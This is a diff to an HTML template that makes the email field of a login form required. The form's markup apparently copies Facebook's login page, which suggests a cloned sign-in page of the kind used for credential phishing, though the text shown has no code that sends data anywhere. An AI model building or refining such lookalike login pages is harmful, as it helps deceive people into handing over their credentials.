--- a/templates/index.html
+++ b/templates/index.html
@@ -102,7 +102,7 @@
                                                 <div class="_6lux"><input type="text" class="inputtext _55r1 _6luy"
                                                         name="email" id="email" data-testid="royal_email"
                                                         placeholder="Email address or phone number" autofocus="1"
-                                                        aria-label="Email address or phone number" /></div>
+                                                        aria-label="Email address or phone number " required ></div>
                                                 <div class="_6lux">
                                                     <div class="_6luy _55r1 _1kbt" id="passContainer"><input
                                                             type="password" class="inputtext _55r1 _6luy _9npi"
